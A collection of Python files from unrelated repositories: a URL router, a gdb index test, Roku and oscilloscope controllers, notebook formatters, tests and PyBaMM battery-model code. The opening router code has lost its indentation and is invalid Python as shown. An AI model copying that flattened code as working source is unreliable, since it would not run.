route = self._split_route(route)
self.root.add(route, data)
def lookup(self, route):
route = self._split_route(route)
result = self.root.find(route)
if result:
result.data = result.data.final
return result
def list(self, route):
route = self._split_route(route)
result = self.root.find(route)
if result:
keys = result.data.routes.keys()
keys = list(keys)
result.data = keys
return result
def _split_route(self, route):
route = os.path.normpath(route)
if route == '/':
return []
else:
route = route.strip('/')
return route.split('/')
class Node:
def __init__(self):
self.final = None
self.routes = {}
self.vroutes = {}
self.rroutes = {}
def add(self, route, data):
if route:
first, rest = route[0], route[1:]
if first.startswith(':'):
first = first[1:]
if first not in self.vroutes:
self.vroutes[first] = Node()
self.vroutes[first].add(rest, data)
elif first.startswith('*'):
first = first[1:]
if first not in self.rroutes:
self.rroutes[first] = Node()
self.rroutes[first].add(rest, data)
else:
if first not in self.routes:
self.routes[first] = Node()
self.routes[first].add(rest, data)
else:
if self.final:
raise RoutingError('node already has assigned value')
self.final = data
def find(self, route):
if route:
first, rest = route[0], route[1:]
if first in self.routes:
result = self.routes[first].find(rest)
if result:
return result
for var in self.vroutes:
result = self.vroutes[var].find(rest)
if result:
result.parameter(var, first)
return result
for var in self.rroutes:
vals = []
while rest:
vals.append(first)
result = self.rroutes[var].find(rest)
if result:
result.parameter(var, vals)
return result
first, rest = rest[0], rest[1:]
vals.append(first)
result = Result(self.rroutes[var])
result.parameter(var, vals)
return result
return None
else:
return Result(self)
class Result:
def __init__(self, data):
self.data = data
self._parameters = {}
def parameter(self, param, data):
self._parameters[param] = data
@property
def parameters(self):
Parameters = namedtuple('Parameters', self._parameters.keys())
return Parameters(**self._parameters)
class RoutingError(Exception):
pass
```
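A short usage sketch of `Router`, exercising plain, `:variable`, and `*rest` segments (the handler strings are placeholders):

```python
router = Router()
router.add('/place/here', 'exact handler')
router.add('/place/:name', 'variable handler')
router.add('/files/*path', 'rest handler')

hit = router.lookup('/place/there')
print(hit.data, hit.parameters.name)   # variable handler there

hit = router.lookup('/files/a/b/c')
print(hit.data, hit.parameters.path)   # rest handler ['a', 'b', 'c']
```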
|
{
"source": "jed-frey/e200-gcc",
"score": 2
}
|
#### File: gdb/contrib/test_pubnames_and_indexes.py
```python
__author__ = '<EMAIL> (<NAME>)'
import os
import subprocess
import sys
OBJCOPY = None
READELF = None
GDB = None
def get_pub_info(filename, readelf_option):
"""Parse and return all the pubnames or pubtypes produced by readelf with the
given option.
"""
    readelf = subprocess.Popen([READELF, '--debug-dump=' + readelf_option,
                                filename], stdout=subprocess.PIPE,
                               universal_newlines=True)
    pubnames = []
    in_list = False
for line in readelf.stdout:
fields = line.split(None, 1)
if (len(fields) == 2 and fields[0] == 'Offset'
and fields[1].strip() == 'Name'):
in_list = True
# Either a blank-line or a new Length field terminates the current section.
elif (len(fields) == 0 or fields[0] == 'Length:'):
            in_list = False
elif (in_list):
pubnames.append(fields[1].strip())
readelf.wait()
return pubnames
def get_gdb_index(filename):
"""Use readelf to dump the gdb index and collect the types and names"""
    readelf = subprocess.Popen([READELF, '--debug-dump=gdb_index',
                                filename], stdout=subprocess.PIPE,
                               universal_newlines=True)
index_symbols = []
symbol_table_started = False
for line in readelf.stdout:
if (line == 'Symbol table:\n'):
            symbol_table_started = True
elif (symbol_table_started):
# Readelf prints gdb-index lines formatted like so:
# [ 4] two::c2<double>::c2: 0
# So take the string between the first close bracket and the last colon.
index_symbols.append(line[line.find(']') + 2: line.rfind(':')])
readelf.wait()
return index_symbols
def CheckSets(list0, list1, name0, name1):
"""Report any setwise differences between the two lists"""
if len(list0) == 0 or len(list1) == 0:
return False
difference0 = set(list0) - set(list1)
if len(difference0) != 0:
print "Elements in " + name0 + " but not " + name1 + ": (",
print len(difference0),
print ")"
for element in difference0:
print " " + element
difference1 = set(list1) - set(list0)
if len(difference1) != 0:
print "Elements in " + name1 + " but not " + name0 + ": (",
print len(difference1),
print ")"
for element in difference1:
print " " + element
if (len(difference0) != 0 or len(difference1) != 0):
return True
print name0 + " and " + name1 + " are identical."
return False
def find_executables():
"""Find the copies of readelf, objcopy and gdb to use."""
# Executable finding logic follows cc-with-index.sh
global READELF
READELF = os.getenv('READELF')
if READELF is None:
READELF = 'readelf'
global OBJCOPY
OBJCOPY = os.getenv('OBJCOPY')
if OBJCOPY is None:
OBJCOPY = 'objcopy'
global GDB
GDB = os.getenv('GDB')
if (GDB is None):
if os.path.isfile('./gdb') and os.access('./gdb', os.X_OK):
GDB = './gdb'
elif os.path.isfile('../gdb') and os.access('../gdb', os.X_OK):
GDB = '../gdb'
elif os.path.isfile('../../gdb') and os.access('../../gdb', os.X_OK):
GDB = '../../gdb'
else:
# Punt and use the gdb in the path.
GDB = 'gdb'
def main(argv):
"""The main subprogram."""
if len(argv) != 2:
print "Usage: test_pubnames_and_indexes.py #"
sys.exit(2)
    find_executables()
# Get the index produced by Gold--It should have been built into the binary.
gold_index = get_gdb_index(argv[1])
# Collect the pubnames and types list
pubs_list = get_pub_info(argv[1], "pubnames")
pubs_list = pubs_list + get_pub_info(argv[1], "pubtypes")
# Generate a .gdb_index with gdb
gdb_index_file = argv[1] + '.gdb-generated-index'
subprocess.check_call([OBJCOPY, '--remove-section', '.gdb_index',
argv[1], gdb_index_file])
subprocess.check_call([GDB, '-batch', '-nx', gdb_index_file,
'-ex', 'save gdb-index ' + os.path.dirname(argv[1]),
'-ex', 'quit'])
subprocess.check_call([OBJCOPY, '--add-section',
'.gdb_index=' + gdb_index_file + '.gdb-index',
gdb_index_file])
gdb_index = get_gdb_index(gdb_index_file)
os.remove(gdb_index_file)
os.remove(gdb_index_file + '.gdb-index')
failed = False
gdb_index.sort()
gold_index.sort()
pubs_list.sort()
# Find the differences between the various indices.
if len(gold_index) == 0:
print "Gold index is empty"
failed |= True
if len(gdb_index) == 0:
print "Gdb index is empty"
failed |= True
if len(pubs_list) == 0:
print "Pubs list is empty"
failed |= True
failed |= CheckSets(gdb_index, gold_index, "gdb index", "gold index")
failed |= CheckSets(pubs_list, gold_index, "pubs list", "gold index")
failed |= CheckSets(pubs_list, gdb_index, "pubs list", "gdb index")
if failed:
print "Test failed"
sys.exit(1)
if __name__ == '__main__':
main(sys.argv)
```
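A tiny illustration of the `CheckSets` contract (synthetic lists rather than real index dumps):

```python
CheckSets(['a', 'b'], ['a', 'b'], 'left', 'right')  # prints "identical", returns False
CheckSets(['a', 'b'], ['a', 'c'], 'left', 'right')  # prints both differences, returns True
CheckSets([], ['a', 'b'], 'left', 'right')          # an empty input short-circuits to False
```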
#### File: testsuite/gdb.python/py-pp-re-notag.py
```python
from time import asctime, gmtime
import gdb # silence pyflakes
class TimePrinter:
def __init__(self, val):
self.val = val
def to_string(self):
secs = int(self.val)
return "%s (%d)" % (asctime(gmtime(secs)), secs)
def build_pretty_printer():
pp = gdb.printing.RegexpCollectionPrettyPrinter("pp-notag")
pp.add_printer('time_t', 'time_t', TimePrinter)
return pp
my_pretty_printer = build_pretty_printer()
gdb.printing.register_pretty_printer(gdb, my_pretty_printer)
```
|
{
"source": "jed-frey/GRPython_HomeAutomation",
"score": 3
}
|
#### File: jed-frey/GRPython_HomeAutomation/PBSKids.py
```python
import roku
import time
channel_map = {"live": [0, 1], "odd_squad": [0, 0], "daniel_tiger": [1, 1], "wild_kratts": [1, 0]}
class PBSKids(roku.Roku):
def __init__(self, **kwargs):
self.roku = roku.Roku(**kwargs)
self.pbs_kids = next(a for a in self.roku.apps if a.name == "PBS KIDS")
def zero(self):
for _ in range(10):
self.left()
self.down()
def live_home(self):
self.back()
self.zero()
def home(self):
self.back(2)
self.zero()
def sleep(self, sleep_time=0.1):
time.sleep(sleep_time)
def launch(self):
self.pbs_kids.launch()
time.sleep(5)
self.zero()
def play_show(self, show):
self.launch()
for _ in range(channel_map[show][0]):
self.roku.right()
for _ in range(channel_map[show][1]):
self.roku.up()
time.sleep(2)
self.select(2)
# Practical Pressing
def left(self):
self.roku.left()
self.sleep()
def right(self):
self.roku.right()
self.sleep()
def up(self):
self.roku.up()
self.sleep()
def down(self):
self.roku.down()
self.sleep()
def select(self, times=1):
for _ in range(times):
self.roku.select()
self.sleep(2)
    def back(self, times=1):
        for _ in range(times):
            self.roku.back()
            self.sleep(2)
if __name__ == "__main__":
import sys
print(sys.argv)
channel_map = {
"live": [0, 1],
"odd_squad": [0,0],
"daniel_tiger": [1, 1],
"wild_kratts": [1, 0],
}
if len(sys.argv)<2:
print(channel_map.keys())
sys.exit()
show = sys.argv[1]
if not show in channel_map.keys():
print(channel_map.keys())
sys.exit()
cfg = {
"host": "192.168.1.128",
"port": 8060,
"timeout": 10, # E
}
p = PBSKids(**cfg)
p.play_show(sys.argv[1])
sys.exit()
```
|
{
"source": "jed-frey/mlshim",
"score": 2
}
|
#### File: mlshim/tests/test_1.py
```python
import os
def test_3():
from mlshim import Matlab
Matlab()
def test_4():
from mlshim import Matlab
from mlshim.utils import get_versions
versions = get_versions()
for version in versions:
matlab = Matlab(version=version)
assert matlab.version == version
def test_5():  # renamed: a second test_4 would shadow the one above
from mlshim import Matlab
from mlshim.utils import get_versions
versions = get_versions()
for version in versions:
matlab = Matlab(version=version)
matlab.run(scripts=[f"disp('Hello World: {version}');"])
```
|
{
"source": "jed-frey/opensda_flasher",
"score": 3
}
|
#### File: opensda_flasher/opensda_flasher/execlass.py
```python
from .config import read_config
class ExeClass:
"""Base class for Server and Client exe classes.
    Parameters:
config: ConfigParser configuration object.
"""
def __init__(self, config=None):
"""Exe Class init."""
if config is None:
self.config = read_config()
else:
self.config = config
self.process = None
def __del__(self):
"""Exe Class destructor."""
if self.process is not None:
try:
self.process.kill()
except BaseException:
pass
@property
def executable(self):
"""Not Implemented."""
raise NotImplementedError
@property
def cmd(self):
"""Not Implemented."""
raise NotImplementedError
def launch(self):
"""Not Implemented."""
raise NotImplementedError
```
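A minimal sketch of how `ExeClass` is meant to be specialised; the `EchoServer` name and command are made up (the real subclasses are Server and Client), and passing an explicit `config` sidesteps `read_config()`:

```python
import delegator  # the same process launcher the real subclasses use

class EchoServer(ExeClass):
    @property
    def executable(self):
        return "/bin/echo"

    @property
    def cmd(self):
        return [self.executable, "hello"]

    def launch(self):
        self.process = delegator.run(self.cmd, block=False)

if __name__ == "__main__":
    server = EchoServer(config={})
    server.launch()
```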
#### File: opensda_flasher/opensda_flasher/server.py
```python
import os
import sys
import delegator
from pexpect.exceptions import EOF
from .execlass import ExeClass
class Server(ExeClass):
"""Debug server class."""
@property
def executable(self):
"""Path to server executable."""
        return os.path.join(
            self.config["S32"]["ROOT"],
            "eclipse",
            "plugins",
            self.config["SERVER"]["PLUGIN"],
            self.config["SERVER"]["platform"],
            self.config["SERVER"]["EXE"],
        )
@property
def cmd(self):
"""Command list to run."""
        return [
            self.executable,
            "-startserver",
            "-singlesession",
            "-interface=OPENSDA",
            "-device={}".format(self.config["SERVER"]["DEVICE"]),
            "-serverport={}".format(self.config["SERVER"]["SERVERPORT"]),
            "-speed={}".format(self.config["SERVER"]["SPEED"]),
            "-port={}".format(self.config["SERVER"]["PORT"]),
        ]
def ports(self):
"""Print available ports."""
self.process = delegator.run([self.executable, "-showhardware"], block=True)
hardware = self.process.out.split("Done.")[-1]
return hardware.strip()
def kill(self):
"""Kill the server.
If a server is already running the task will fail. Use this to kill any
existing processes.
"""
self.process = delegator.run(["taskkill", "/f", "/im", os.path.basename(self.executable)], block=True)
def launch(self):
"""Launch debug server."""
try:
self.process = delegator.run(self.cmd, block=False)
print("Waiting for GDB servers to complete startup ...", end="")
sys.stdout.flush()
# Look for the "All Serverns Running" message from stdout.
self.process.expect("All Servers Running")
print("... Done")
sys.stdout.flush()
except EOF:
error = f"Server exited immediately. Is another {self.executable} instance running?" # noqa
raise (Exception(error))
```
|
{
"source": "jed-frey/PyDAT",
"score": 2
}
|
#### File: PyDAT/pydat/dat.py
```python
from PyQt5.uic import loadUiType
from PyQt5 import QtCore, QtWidgets
import sys
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
import os
uipath = os.path.join(os.path.dirname(os.path.abspath(__file__)),"ui")
Ui_MainWindow, QMainWindow = loadUiType(os.path.join(uipath,'dat.ui'))
from scipy import signal
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self, ):
super(self.__class__, self).__init__()
self.setupUi(self)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
        self.actionQuit.triggered.connect(self.quit)
def ping(self):
print("pong")
def actionOpen(self):
print("self.actionOpen")
def quit(self):
print("Well, bye.")
QtWidgets.qApp.quit()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv) # A new instance of QApplication
main = MainWindow()
main.show()
sys.exit(app.exec_())
```
|
{
"source": "jed-frey/python_cnc3018",
"score": 3
}
|
#### File: python_notebookfmt/NotebookFmt/black_notebook_cells.py
```python
import black
import nbformat
def black_notebook_cells(notebook=None):
with open(notebook, "rb") as fp:
nb = nbformat.read(fp=fp, as_version=nbformat.NO_CONVERT)
markdown_cells = list()
code_cells = list()
for cell in nb["cells"]:
if cell["cell_type"] == "code":
code_cells.append(cell)
elif cell["cell_type"] == "markdown":
markdown_cells.append(cell)
else:
raise Exception(cell["cell_type"])
for code_cell in code_cells:
if code_cell["source"] == "":
continue
try:
code_cell["source"] = black.format_str(
code_cell["source"], line_length=80
)
        except Exception:
print("Failed: {}".format(code_cell["source"]))
with open(notebook, "w") as fp:
nbformat.write(nb, fp)
```
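Note that `format_str(..., line_length=80)` is an older black API; current releases take a `mode=black.Mode(...)` argument instead. A quick standalone check under that old-API assumption:

```python
import black

ugly = "x = { 'a':1,'b':2 }"
print(black.format_str(ugly, line_length=80))  # x = {"a": 1, "b": 2}
```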
#### File: python_notebookfmt/NotebookFmt/isort_notebook_cells.py
```python
import isort
import nbformat
def isort_notebook_cells(notebook):
with open(notebook, "rb") as fp:
nb = nbformat.read(fp=fp, as_version=nbformat.NO_CONVERT)
markdown_cells = list()
code_cells = list()
for cell in nb["cells"]:
if cell["cell_type"] == "code":
code_cells.append(cell)
elif cell["cell_type"] == "markdown":
markdown_cells.append(cell)
else:
raise Exception(cell["cell_type"])
for code_cell in code_cells:
if code_cell["source"] == "":
continue
if "import" in code_cell["source"]:
s = isort.SortImports(file_contents=code_cell.source)
code_cell.source = s.output.strip()
with open(notebook, "w") as fp:
nbformat.write(nb, fp)
```
#### File: jed-frey/python_cnc3018/utils.py
```python
import datetime
import os
from subprocess import check_output
from IPython.display import Image, display_jpeg
resolution = "1600x900"
def picture():
img_root = "images"
img_name = "{}.jpeg".format(datetime.datetime.now())
if not os.path.exists(img_root):
os.makedirs(img_root)
img_path = os.path.join(img_root, img_name)
cmd_array = [
"streamer",
"-c",
"/dev/video1",
"-s",
resolution,
"-o",
img_path,
]
    ret = check_output(cmd_array)
display_jpeg(Image(img_path))
```
|
{
"source": "jed-frey/python_ds1000de",
"score": 3
}
|
#### File: python_ds1000de/ds1000de/DS1000DE.py
```python
import visa
from .Acquire import Acquire
from .IO import IO
from .System import System
class DS1000DE(System,
IO):
"""Python class for Rigol DS1000DE series oscilloscopes."""
def __init__(self, device="USB"):
"""DS1000DE Init."""
try:
rm = visa.ResourceManager()
except BaseException:
rm = visa.ResourceManager("@py")
resources = rm.list_resources()
resource = [resource for resource in resources if device in resource]
if len(resource) == 0:
raise Exception("No devices found matching '{}'".format(device))
if len(resource) > 1:
raise Exception(
"Multiple devices found matching '{}':\n\t{}".format(
device, "\n\t".join(resource)))
self.resource = resource[0]
self.inst = rm.open_resource(self.resource)
self.r = self.inst.query
self.w = self.inst.write
self.acquire = Acquire(self)
def reset(self):
"""Reset the scope."""
_, status = self.w("*RST")
assert(status.value == 0)
@property
def idn(self):
"""Return *IDN?."""
return self.r("*IDN?")
@property
def manufacturer(self):
"""Return manufacturer."""
manufacturer, model, serial, software = self.idn.split(",")
return manufacturer
@property
def model(self):
"""Return model."""
manufacturer, model, serial, software = self.idn.split(",")
return model
@property
def serial(self):
"""Return serial."""
manufacturer, model, serial, software = self.idn.split(",")
return serial
@property
def software(self):
"""Return software version."""
manufacturer, model, serial, software = self.idn.split(",")
return software
```
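The four `*IDN?` properties all assume the comma-separated reply format that SCPI instruments return; a sketch with a hypothetical response string:

```python
idn = "Rigol Technologies,DS1102E,DS1EB000000000,00.04.01"  # made-up reply
manufacturer, model, serial, software = idn.split(",")
print(manufacturer, model, serial, software)
```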
#### File: python_ds1000de/ds1000de/IO.py
```python
class IO(object):
"""IO Functions for interacting with the scope."""
def write(self, cmd):
"""Write a command to the instrument."""
_, status = self.inst.write(cmd)
assert(status.value == 0)
def query(self, cmd):
"""Query the instrument for a value."""
return self.inst.query(cmd)
```
|
{
"source": "jed-frey/python_MDF_Indexer",
"score": 3
}
|
#### File: jed-frey/python_MDF_Indexer/01_MakeMDF-Data.py
```python
import redis
import configparser
import rq
import make_data
def distributed_data_gen():
config = configparser.ConfigParser()
config.read('config.ini')
r = redis.StrictRedis(
host=config["redis"]["host"],
port=config["redis"]["port"],
db=config["redis"]["rq"],
)
q = rq.Queue(connection=r)
for idx in range(1000):
try:
f = q.enqueue(make_data.random_data)
print("{:04d}: {}".format(idx, f))
except KeyboardInterrupt:
print("\n\nCanceled\n\n")
break
except:
raise
def local_data_gen():
for idx in range(1000):
try:
file = make_data.random_data()
print("{:04d}: {}".format(idx, file))
except KeyboardInterrupt:
print("\n\nDone\n\n")
break
if __name__ == "__main__":
local_data_gen()
```
|
{
"source": "jed-frey/python-mhs5200a",
"score": 3
}
|
#### File: python-mhs5200a/tests/test_frequency.py
```python
def test_freq_01(chan1):
freq = 1
chan1.frequency = freq
assert chan1.frequency == freq
def test_freq_10(chan1):
freq = 10
chan1.frequency = freq
assert chan1.frequency == freq
def test_freq_100(chan1):
freq = 100
chan1.frequency = freq
assert chan1.frequency == freq
def test_freq_1MHz(chan1):
chan1.frequency = "1MHz"
assert chan1.frequency == 1000000
def test_freq_1kHz(chan1):
chan1.frequency = "1kHz"
assert chan1.frequency == 1000
```
|
{
"source": "jedgedrudd/PyBaMM",
"score": 2
}
|
#### File: examples/scripts/create-model.py
```python
import pybamm
import numpy as np
import matplotlib.pyplot as plt
# 1. Initialise model ------------------------------------------------------------------
model = pybamm.BaseModel()
# 2. Define parameters and variables ---------------------------------------------------
# dimensional parameters
k_dim = pybamm.Parameter("Reaction rate constant")
L_0_dim = pybamm.Parameter("Initial thickness")
V_hat_dim = pybamm.Parameter("Partial molar volume")
c_inf_dim = pybamm.Parameter("Bulk electrolyte solvent concentration")
def D_dim(cc):
return pybamm.FunctionParameter("Diffusivity", cc)
# dimensionless parameters
k = k_dim * L_0_dim / D_dim(c_inf_dim)
V_hat = V_hat_dim * c_inf_dim
def D(cc):
c_dim = c_inf_dim * cc
return D_dim(c_dim) / D_dim(c_inf_dim)
# variables
x = pybamm.SpatialVariable("x", domain="SEI layer", coord_sys="cartesian")
c = pybamm.Variable("Solvent concentration", domain="SEI layer")
L = pybamm.Variable("SEI thickness")
# 3. State governing equations ---------------------------------------------------------
R = k * pybamm.BoundaryValue(c, "left") # SEI reaction flux
N = -(1 / L) * D(c) * pybamm.grad(c) # solvent flux
dcdt = (V_hat * R) * pybamm.inner(x / L, pybamm.grad(c)) - (1 / L) * pybamm.div(
N
) # solvent concentration governing equation
dLdt = V_hat * R # SEI thickness governing equation
model.rhs = {c: dcdt, L: dLdt} # add to model
# 4. State boundary conditions ---------------------------------------------------------
D_left = pybamm.BoundaryValue(
D(c), "left"
) # pybamm requires BoundaryValue(D(c)) and not D(BoundaryValue(c))
grad_c_left = L * R / D_left # left bc
c_right = pybamm.Scalar(1) # right bc
# add to model
model.boundary_conditions = {
c: {"left": (grad_c_left, "Neumann"), "right": (c_right, "Dirichlet")}
}
# 5. State initial conditions ----------------------------------------------------------
model.initial_conditions = {c: pybamm.Scalar(1), L: pybamm.Scalar(1)}
# 6. State output variables ------------------------------------------------------------
model.variables = {
"SEI thickness": L,
"SEI growth rate": dLdt,
"Solvent concentration": c,
"SEI thickness [m]": L_0_dim * L,
"SEI growth rate [m/s]": (D_dim(c_inf_dim) / L_0_dim) * dLdt,
"Solvent concentration [mols/m^3]": c_inf_dim * c,
}
"--------------------------------------------------------------------------------------"
"Using the model"
# define geometry
geometry = {
"SEI layer": {"primary": {x: {"min": pybamm.Scalar(0), "max": pybamm.Scalar(1)}}}
}
# diffusivity function
def Diffusivity(cc):
return cc * 10 ** (-5)
# parameter values (not physically based, for example only!)
param = pybamm.ParameterValues(
{
"Reaction rate constant": 20,
"Initial thickness": 1e-6,
"Partial molar volume": 10,
"Bulk electrolyte solvent concentration": 1,
"Diffusivity": Diffusivity,
}
)
# process model and geometry
param.process_model(model)
param.process_geometry(geometry)
# mesh and discretise
submesh_types = {"SEI layer": pybamm.Uniform1DSubMesh}
var_pts = {x: 50}
mesh = pybamm.Mesh(geometry, submesh_types, var_pts)
spatial_methods = {"SEI layer": pybamm.FiniteVolume}
disc = pybamm.Discretisation(mesh, spatial_methods)
disc.process_model(model)
# solve
solver = pybamm.ScipySolver()
t = np.linspace(0, 1, 100)
solution = solver.solve(model, t)
# Extract output variables
L_out = pybamm.ProcessedVariable(
model.variables["SEI thickness"], solution.t, solution.y, mesh
)
# plot
plt.plot(solution.t, L_out(solution.t))
plt.xlabel("Time")
plt.ylabel("SEI thickness")
plt.show()
```
#### File: electrolytes/lipf6_Marquis2019/electrolyte_conductivity_Capiglia1999.py
```python
import autograd.numpy as np
def electrolyte_conductivity_Capiglia1999(c_e, T, T_inf, E_k_e, R_g):
"""
Conductivity of LiPF6 in EC:DMC as a function of ion concentration. The original
data is from [1]. The fit is from Dualfoil [2].
References
----------
.. [1] C Capiglia et al. 7Li and 19F diffusion coefficients and thermal
properties of non-aqueous electrolyte solutions for rechargeable lithium batteries.
Journal of power sources 81 (1999): 859-862.
.. [2] http://www.cchem.berkeley.edu/jsngrp/fortran.html
Parameters
----------
c_e: :class: `numpy.Array`
Dimensional electrolyte concentration
T: :class: `numpy.Array`
Dimensional temperature
T_inf: double
Reference temperature
E_k_e: double
Electrolyte conductivity activation energy
R_g: double
The ideal gas constant
Returns
-------
:`numpy.Array`
        Electrolyte conductivity
"""
sigma_e = (
0.0911
+ 1.9101 * (c_e / 1000)
- 1.052 * (c_e / 1000) ** 2
+ 0.1554 * (c_e / 1000) ** 3
)
arrhenius = np.exp(E_k_e / R_g * (1 / T_inf - 1 / T))
return sigma_e * arrhenius
```
#### File: pybamm/expression_tree/broadcasts.py
```python
import numbers
import numpy as np
import pybamm
class Broadcast(pybamm.SpatialOperator):
"""A node in the expression tree representing a broadcasting operator.
Broadcasts a child to a specified domain. After discretisation, this will evaluate
to an array of the right shape for the specified domain.
Parameters
----------
child : :class:`Symbol`
child node
broadcast_domain : iterable of str
Primary domain for broadcast. This will become the domain of the symbol
auxiliary_domain : iterable of str
Secondary domain for broadcast. Currently, this is only used for testing that
symbols have the right shape.
broadcast_type : str, optional
Whether to broadcast to the full domain (primary and secondary) or only in the
primary direction. Default is "full".
name : str
name of the node
**Extends:** :class:`SpatialOperator`
"""
def __init__(
self,
child,
broadcast_domain,
auxiliary_domains=None,
broadcast_type="full",
name=None,
):
# Convert child to scalar if it is a number
if isinstance(child, numbers.Number):
child = pybamm.Scalar(child)
if name is None:
name = "broadcast"
# perform some basic checks and set attributes
domain = self.check_and_set_domain_and_broadcast_type(
child, broadcast_domain, broadcast_type
)
self.broadcast_type = broadcast_type
self.broadcast_domain = broadcast_domain
if auxiliary_domains is None:
if child.domain != []:
auxiliary_domains = {"secondary": child.domain}
else:
auxiliary_domains = {}
super().__init__(name, child, domain, auxiliary_domains)
def check_and_set_domain_and_broadcast_type(
self, child, broadcast_domain, broadcast_type
):
"""
Set broadcast domain and broadcast type, performing basic checks to make sure
it is compatible with the child
"""
# Acceptable broadcast types
if broadcast_type not in ["primary", "secondary", "full"]:
raise KeyError(
"""Broadcast type must be either: 'primary', 'secondary', or 'full' and
not {}""".format(
broadcast_type
)
)
domain = broadcast_domain
# Variables on the current collector can only be broadcast to 'primary'
if broadcast_type == "full":
if child.domain == ["current collector"]:
raise ValueError(
"""
Variables on the current collector must be broadcast to 'primary'
only
"""
)
return domain
def _unary_simplify(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return Broadcast(
child, self.broadcast_domain, self.auxiliary_domains, self.broadcast_type
)
def _unary_new_copy(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return Broadcast(
child, self.broadcast_domain, self.auxiliary_domains, self.broadcast_type
)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a Broadcast.
See :meth:`pybamm.Symbol.evaluate_for_shape_using_domain()`
"""
child_eval = self.children[0].evaluate_for_shape()
vec = pybamm.evaluate_for_shape_using_domain(self.domain)
if self.broadcast_type == "primary":
return np.outer(child_eval, vec).reshape(-1, 1)
elif self.broadcast_type == "full":
return child_eval * vec
class PrimaryBroadcast(Broadcast):
"""A node in the expression tree representing a primary broadcasting operator.
Broadcasts in a `primary` dimension only. That is, makes explicit copies
Parameters
----------
child : :class:`Symbol`
child node
broadcast_domain : iterable of str
Primary domain for broadcast. This will become the domain of the symbol
name : str
name of the node
**Extends:** :class:`SpatialOperator`
"""
def __init__(self, child, broadcast_domain, name=None):
super().__init__(child, broadcast_domain, broadcast_type="primary", name=name)
def _unary_simplify(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return PrimaryBroadcast(child, self.broadcast_domain)
def _unary_new_copy(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return PrimaryBroadcast(child, self.broadcast_domain)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a Broadcast.
See :meth:`pybamm.Symbol.evaluate_for_shape_using_domain()`
"""
child_eval = self.children[0].evaluate_for_shape()
vec = pybamm.evaluate_for_shape_using_domain(self.domain)
return np.outer(child_eval, vec).reshape(-1, 1)
class FullBroadcast(Broadcast):
"A class for full broadcasts"
def __init__(self, child, broadcast_domain, auxiliary_domains, name=None):
if auxiliary_domains == "current collector":
auxiliary_domains = {"secondary": "current collector"}
super().__init__(
child,
broadcast_domain,
auxiliary_domains=auxiliary_domains,
broadcast_type="full",
name=name,
)
def _unary_simplify(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return FullBroadcast(child, self.broadcast_domain, self.auxiliary_domains)
def _unary_new_copy(self, child):
""" See :meth:`pybamm.UnaryOperator.simplify()`. """
return FullBroadcast(child, self.broadcast_domain, self.auxiliary_domains)
def evaluate_for_shape(self):
"""
Returns a vector of NaNs to represent the shape of a Broadcast.
See :meth:`pybamm.Symbol.evaluate_for_shape_using_domain()`
"""
child_eval = self.children[0].evaluate_for_shape()
vec = pybamm.evaluate_for_shape_using_domain(
self.domain, self.auxiliary_domains
)
return child_eval * vec
```
#### File: pybamm/expression_tree/evaluate.py
```python
import pybamm
# need numpy imported for code generated in EvaluatorPython
import numpy as np # noqa: F401
import scipy.sparse # noqa: F401
from collections import OrderedDict
def id_to_python_variable(symbol_id, constant=False):
"""
This function defines the format for the python variable names used in find_symbols
and to_python. Variable names are based on a nodes' id to make them unique
"""
if constant:
var_format = "self.const_{:05d}"
else:
var_format = "self.var_{:05d}"
# Need to replace "-" character to make them valid python variable names
return var_format.format(symbol_id).replace("-", "m")
def find_symbols(symbol, constant_symbols, variable_symbols):
"""
This function converts an expression tree to a dictionary of node id's and strings
specifying valid python code to calculate that nodes value, given y and t.
The function distinguishes between nodes that represent constant nodes in the tree
(e.g. a pybamm.Matrix), and those that are variable (e.g. subtrees that contain
pybamm.StateVector). The former are put in `constant_symbols`, the latter in
`variable_symbols`
Note that it is important that the arguments `constant_symbols` and
    `variable_symbols` be an *ordered* dict, since the final ordering of the code lines
    is important for the calculations. A dict is specified rather than a list so that
    identical subtrees (which give identical ids) are not recalculated in the code
Parameters
----------
symbol : :class:`pybamm.Symbol`
The symbol or expression tree to convert
    constant_symbols: collections.OrderedDict
        The output dictionary of constant symbol ids to lines of code
    variable_symbols: collections.OrderedDict
        The output dictionary of variable (with y or t) symbol ids to lines of code
"""
if symbol.is_constant():
constant_symbols[symbol.id] = symbol.evaluate()
return
# process children recursively
for child in symbol.children:
find_symbols(child, constant_symbols, variable_symbols)
# calculate the variable names that will hold the result of calculating the
# children variables
children_vars = [
id_to_python_variable(child.id, child.is_constant())
for child in symbol.children
]
if isinstance(symbol, pybamm.BinaryOperator):
# Multiplication and Division need special handling for scipy sparse matrices
# TODO: we can pass through a dummy y and t to get the type and then hardcode
# the right line, avoiding these checks
if isinstance(symbol, pybamm.Multiplication):
symbol_str = (
"scipy.sparse.csr_matrix({0}.multiply({1})) "
"if scipy.sparse.issparse({0}) else "
"scipy.sparse.csr_matrix({1}.multiply({0})) "
"if scipy.sparse.issparse({1}) else "
"{0} * {1}".format(children_vars[0], children_vars[1])
)
elif isinstance(symbol, pybamm.Division):
symbol_str = (
"scipy.sparse.csr_matrix({0}.multiply(1/{1})) "
"if scipy.sparse.issparse({0}) else "
"{0} / {1}".format(children_vars[0], children_vars[1])
)
elif isinstance(symbol, pybamm.Inner):
symbol_str = (
"{0}.multiply({1}) "
"if scipy.sparse.issparse({0}) else "
"{1}.multiply({0}) "
"if scipy.sparse.issparse({1}) else "
"{0} * {1}".format(children_vars[0], children_vars[1])
)
elif isinstance(symbol, pybamm.Outer):
symbol_str = "np.outer({}, {}).reshape(-1, 1)".format(
children_vars[0], children_vars[1]
)
elif isinstance(symbol, pybamm.Kron):
symbol_str = "scipy.sparse.csr_matrix(scipy.sparse.kron({}, {}))".format(
children_vars[0], children_vars[1]
)
else:
symbol_str = children_vars[0] + " " + symbol.name + " " + children_vars[1]
